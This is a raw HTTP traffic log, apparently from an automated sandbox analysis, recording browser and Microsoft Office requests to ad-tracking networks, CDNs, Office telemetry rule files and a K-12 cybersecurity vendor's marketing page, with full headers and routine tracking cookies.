Source: global trafficHTTP traffic detected: GET /eyeota?uid=2vSdg0G_wj1oSR5uhhmamgKTQUQPGWo6UXUC2ilh8T3A&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.sharethis.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /k12-cybersecurity-safety-k12dive?gad_source=5 HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAttribution-Reporting-Eligible: not-event-source, navigation-source;triggerReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aclk?nis=6&sa=l&ai=CzpLmhOAMZ46MNdLp78EPn-jPyQnboZvOeo-Yz9CQE6yFu4fTOBABIKuv2JABYMkGoAGlxfPnA8gBAagDAcgDywSqBPkBT9Cep1guQNdWpPsrmNwBIZ2KcXe07fxUOlQoQaI0RONvZdfXKhZbO6f9rnrbOMDO2JUpIadxb9srUNd2EBCTqAdj3bLPaSgZ3jIVIzl7UU-IOFO-V5Pq9ASgMq0BtJZFMZtnquXJX1jNN5ovREKhjebK0Q2wP9xqO6BvKPIxFbDLSB9rwzaBdV3TiycQPFc9dN1KSBU7y9IVonucXuTQenZiUDUbEqL70-SjNPPllWiqjrLsIa4giBKMUBVgzttceF9DcNJAXT_EQ1EZbIvirUt_FiXB9fGyTNYWfJtjlL6HRgqlSaMByE5YNVwbSfjxlbjWsjlGZrBIwAT4h4n_hwWIBYO-m49RoAYugAfDuowYqAfVyRuoB9m2sQKoB6a-G6gHjs4bqAeT2BuoB_DgG6gH7paxAqgH_p6xAqgHr76xAqgHmgaoB_PRG6gHltgbqAeqm7ECqAeDrbECqAfgvbECqAf_nrECqAffn7ECqAfKqbECqAfrpbECqAfqsbECqAeZtbECqAe-t7ECqAf4wrECqAf7wrEC2AcB0ggmCIBhEAEYHzICigI6C4BAgMCAgICgqIACSL39wTpY2JCM58ONiQOxCVEO7X6GkChngAoBmAsByAsB2gwRCgsQ0Oewx6S6g5iDARICAQOqDQJVU8gNAdgTCtAVAZgWAfgWAYAXAbIXAhgBuhcCOAGyGAkSAqRmGC4iAQDQGAE&ae=1&ase=2&gclid=EAIaIQobChMIjt6N58ONiQMV0vQ7Ah0f9DOZEAEYASAAEgKBIvD_BwE&num=1&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CYYAQ&sig=AOD64_3gZVqtoSijFnTKmu_DnIf-3Ae7vw&client=ca-pub-2542884292174911&rf=1&nb=8&act=1&ri=1&adurl=https://get.managedmethods.com/k12-cybersecurity-safety-k12dive%3Fgad_source%3D5 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAttribution-Reporting-Eligible: not-event-source=trigger, navigation-sourceReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CfeE%7C&abl=CF&pfx=0&fu=0&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=2199Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cooki
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /hs/hsstatic/cos-i18n/static-1.53/bundles/project.js HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: my7recovery.blogspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt/c/3825/optimus_rules.json HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_dc=1; _cc_id=d623ac854d7c5259de086b3e7c50fd78
Source: global trafficHTTP traffic detected: GET /hs-fs/hub/6834707/hub_generated/module_assets/25372454157/1581034302168/module_25372454157_Button.min.css HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hs-fs/hub/6834707/hub_generated/module_assets/175893307026/1723836629600/module_175893307026_Testimonials_Slider_Overlapping.min.css HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hs-fs/hub/6834707/hub_generated/template_assets/175647721775/1728330106102/Marketplace/Inbound_Pixels/Inspire/Coded_Files/inspire_hero_2024_redesign.min.css HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hs-fs/hub/6834707/hub_generated/template_assets/24340422591/1579892512031/Marketplace/Inbound_Pixels/Inspire/Coded_Files/reset.min.css HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /ajax/libs/slick-carousel/1.9.0/slick.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/slick-carousel/1.9.0/slick-theme.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/slick-carousel/1.9.0/slick.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_hcms/forms/v2.js HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hub/7052064/hub_generated/template_assets/1728333327502/hubspot/hubspot_default/shared/responsive/layout.min.css HTTP/1.1Host: 7052064.fs1.hubspotusercontent-na1.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.js HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /hs/hsstatic/cos-i18n/static-1.53/bundles/project.js HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /pagead/interaction/?ai=CzpLmhOAMZ46MNdLp78EPn-jPyQnboZvOeo-Yz9CQE6yFu4fTOBABIKuv2JABYMkGoAGlxfPnA8gBAagDAcgDywSqBPkBT9Cep1guQNdWpPsrmNwBIZ2KcXe07fxUOlQoQaI0RONvZdfXKhZbO6f9rnrbOMDO2JUpIadxb9srUNd2EBCTqAdj3bLPaSgZ3jIVIzl7UU-IOFO-V5Pq9ASgMq0BtJZFMZtnquXJX1jNN5ovREKhjebK0Q2wP9xqO6BvKPIxFbDLSB9rwzaBdV3TiycQPFc9dN1KSBU7y9IVonucXuTQenZiUDUbEqL70-SjNPPllWiqjrLsIa4giBKMUBVgzttceF9DcNJAXT_EQ1EZbIvirUt_FiXB9fGyTNYWfJtjlL6HRgqlSaMByE5YNVwbSfjxlbjWsjlGZrBIwAT4h4n_hwWIBYO-m49RoAYugAfDuowYqAfVyRuoB9m2sQKoB6a-G6gHjs4bqAeT2BuoB_DgG6gH7paxAqgH_p6xAqgHr76xAqgHmgaoB_PRG6gHltgbqAeqm7ECqAeDrbECqAfgvbECqAf_nrECqAffn7ECqAfKqbECqAfrpbECqAfqsbECqAeZtbECqAe-t7ECqAf4wrECqAf7wrEC2AcB0ggmCIBhEAEYHzICigI6C4BAgMCAgICgqIACSL39wTpY2JCM58ONiQOxCVEO7X6GkChngAoBmAsByAsB2gwRCgsQ0Oewx6S6g5iDARICAQOqDQJVU8gNAdgTCtAVAZgWAfgWAYAXAbIXAhgBuhcCOAGyGAkSAqRmGC4iAQDQGAE&sigh=SRwlPYmeH-8&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CY&label=window_focus&gqid=hOAMZ5jgMoqI1LsP45DL0AQ&qqid=CI7ejefDjYkDFdL0OwIdH_QzmQ&return=0 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Cache-Control: max-age=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CfeE%7C&abl=CF&pfx=0&fu=0&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=2199Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUk0zOnp7KPAX2H7PV04lK3EUODRxZQzvzNUj9mqfajXpAGNwRNeTOLJeNEyKAk
Source: global trafficHTTP traffic detected: GET /6/data HTTP/1.1Host: bcp.crwdcntrl.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_dc=1; _cc_id=d623ac854d7c5259de086b3e7c50fd78; _cc_cc="ACZ4nGNQSDEzMk5MtjA1STFPNjUytUxJNbAwSzJOBfIM0lLMLRiAIJ3nQd%2Bv%2F%2F%2F%2F8zPAAO%2B9D5ZMH2UZ%2FjMybq8HkQw%2FNk5hQRVZ%2FqcQVeDc0UPMqCK7910WQBU5vHgOmjHt655yo4o0%2FNdEFXjy%2BKYhqsi9Li1UgUunHrGhirxbgm7Tm5kHmFBFAKaJYtA%3D"; _cc_aud="ABR4nGNgYGBI53nQxwADzAwMXDPArEWtIJLxYT2QBABd2gUP"
Source: global trafficHTTP traffic detected: GET /ajax/libs/slick-carousel/1.9.0/slick.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hs-fs/hubfs/MM%20Logos/ManagedMethods_Logo_NarrowWidth_ForLightBackgrounds_HEX_Color_150px.png?width=150&height=51&name=ManagedMethods_Logo_NarrowWidth_ForLightBackgrounds_HEX_Color_150px.png HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
